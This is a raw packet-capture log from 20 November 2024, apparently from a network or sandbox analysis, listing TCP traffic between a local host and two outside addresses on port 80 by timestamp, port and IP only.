                                                Nov 20, 2024 10:11:25.759685993 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.759691000 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.759699106 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.759711981 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.759726048 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.760519028 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.760529995 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.760540009 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.760551929 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.760562897 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.760572910 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.760574102 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.760585070 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.760587931 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.760596991 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.760606050 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.760607958 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.760628939 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.760636091 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.760647058 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.760658026 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.760673046 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.761363029 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.761373997 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.761384010 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.761394978 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.761408091 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.761415958 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.761415958 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.761420012 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.761429071 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.761432886 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.761440992 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.761444092 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.761455059 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.761456966 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.761467934 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.761470079 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.761481047 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.761487007 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.761492014 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.761498928 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.761512041 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.761527061 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.761698008 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.762120008 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.762130976 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.762141943 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.762151957 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.762164116 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.762165070 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.762180090 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.762195110 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.792646885 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.792659998 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.792670965 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.792705059 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.792717934 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.792778015 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.792805910 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.792817116 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.792841911 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.793056965 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.793068886 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.793103933 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.793184042 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.793195963 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.793236017 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.793253899 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.793265104 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.793275118 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.793286085 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.793287039 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.793299913 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.793313980 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.845487118 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.845499039 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.845550060 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.845617056 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.845769882 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.845782042 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.845788956 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.845802069 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.845815897 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.845957994 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.845968962 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.845980883 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.845993042 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.845999956 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.846004963 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.846013069 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.846018076 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.846040964 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.846052885 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.846052885 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.846445084 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.846457005 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.846467972 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.846481085 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.846487045 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.846493959 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.846502066 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.846508026 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.846513987 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.846522093 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.846525908 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.846539974 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.846551895 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.847040892 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.847052097 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.847062111 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.847073078 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.847080946 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.847084999 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.847095966 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.847106934 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.847119093 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.847352028 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.847362995 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.847374916 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.847387075 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.847394943 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.847399950 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.847408056 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.847419977 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.847434998 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.847534895 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.847547054 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.847558022 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.847570896 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.847578049 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.847590923 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.847604036 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.847706079 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.847718000 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.847748041 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.848366976 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.848380089 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.848412037 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.848507881 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.848520041 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.848531008 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.848543882 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.848547935 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.848561049 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.848575115 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.848683119 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.848694086 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.848706007 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.848716974 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.848725080 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.848727942 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.848737955 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.848751068 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.849348068 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.849359989 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.849371910 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.849387884 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.849400997 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.849530935 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.849543095 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.849553108 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.849565029 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.849574089 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.849576950 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.849586964 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.849590063 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.849601030 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.849603891 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.849615097 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.849617958 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.849630117 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.849634886 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.849647999 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.849663019 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.850207090 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.850218058 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.850229025 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.850239992 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.850249052 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.850253105 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.850261927 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.850275040 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.850289106 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.850383043 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.850394011 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.850404978 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.850415945 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.850421906 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.850429058 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.850438118 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.850441933 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.850450039 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.850462914 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.850476027 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.851130009 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.851144075 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.851155043 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.851166010 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.851177931 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.851188898 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.851202965 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.851214886 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.851278067 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.851289988 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.851300001 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.851310968 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.851319075 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.851325989 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.851325989 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.851339102 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.851345062 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.851356983 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.851372004 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.852159023 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.852170944 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.852181911 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.852193117 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.852200985 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.852206945 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.852215052 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.852227926 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.852241039 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.852287054 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.852298975 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.852308989 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.852320910 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.852332115 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.852334023 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.852344990 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.852348089 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.852358103 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.852370977 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.852385998 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.853059053 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.853070974 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.853081942 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.853094101 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.853101969 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.853105068 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.853115082 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.853117943 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.853130102 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.853147030 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.853194952 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.853207111 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.853229046 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.853241920 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.896905899 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.896919012 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.896930933 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.896965027 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.896980047 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.896991014 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.897005081 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.897042036 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.897177935 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.897188902 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.897202015 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.897216082 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.897219896 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.897241116 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.897253990 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.897435904 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.897454023 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.897465944 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.897476912 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.897488117 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.897497892 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.897516012 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.897783041 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.897794008 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.897805929 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.897815943 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.897825956 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.897842884 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.935744047 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.935777903 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.935789108 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.935801983 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.935836077 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.935836077 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.935887098 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.935899019 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.935909986 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.935923100 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.935928106 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.935942888 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.935955048 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:30.056107044 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:30.058229923 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:33.292522907 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:34.073167086 CET4917180192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:34.078253984 CET804917194.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:34.082261086 CET4917180192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:34.224472046 CET4917180192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:34.232295036 CET804917194.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:34.232361078 CET4917180192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:34.240298986 CET804917194.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:34.825088978 CET804917194.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:34.825139046 CET804917194.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:34.825228930 CET4917180192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:34.825299978 CET4917180192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:34.831660032 CET804917194.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:34.920490980 CET4917280192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:34.926080942 CET804917294.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:34.926163912 CET4917280192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:34.927901030 CET4917280192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:34.936938047 CET804917294.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:34.936985970 CET4917280192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:34.944359064 CET804917294.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:35.688764095 CET804917294.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:35.688999891 CET4917280192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:35.689007998 CET804917294.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:35.689060926 CET4917280192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:35.698219061 CET804917294.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:35.741369963 CET4917380192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:35.746495008 CET804917394.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:35.746566057 CET4917380192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:35.748172045 CET4917380192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:35.753206968 CET804917394.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:35.753276110 CET4917380192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:35.758224964 CET804917394.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:36.639029026 CET804917394.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:36.639056921 CET804917394.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:36.639270067 CET4917380192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:36.639271021 CET4917380192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:36.644738913 CET804917394.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:36.774934053 CET4917480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:36.780591965 CET804917494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:36.780663967 CET4917480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:36.782336950 CET4917480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:36.788336039 CET804917494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:36.788419962 CET4917480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:36.795069933 CET804917494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:37.678376913 CET804917494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:37.678663969 CET804917494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:37.678740978 CET4917480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:37.684017897 CET4917480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:37.690893888 CET804917494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:37.847090006 CET4917580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:37.854008913 CET804917594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:37.854104996 CET4917580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:37.858225107 CET4917580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:37.865158081 CET804917594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:37.865230083 CET4917580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:37.872039080 CET804917594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:38.715972900 CET804917594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:38.716087103 CET804917594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:38.716248989 CET4917580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:38.717058897 CET4917580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:11:38.721966982 CET804917594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:11:39.918752909 CET4917680192.168.2.2294.156.177.41
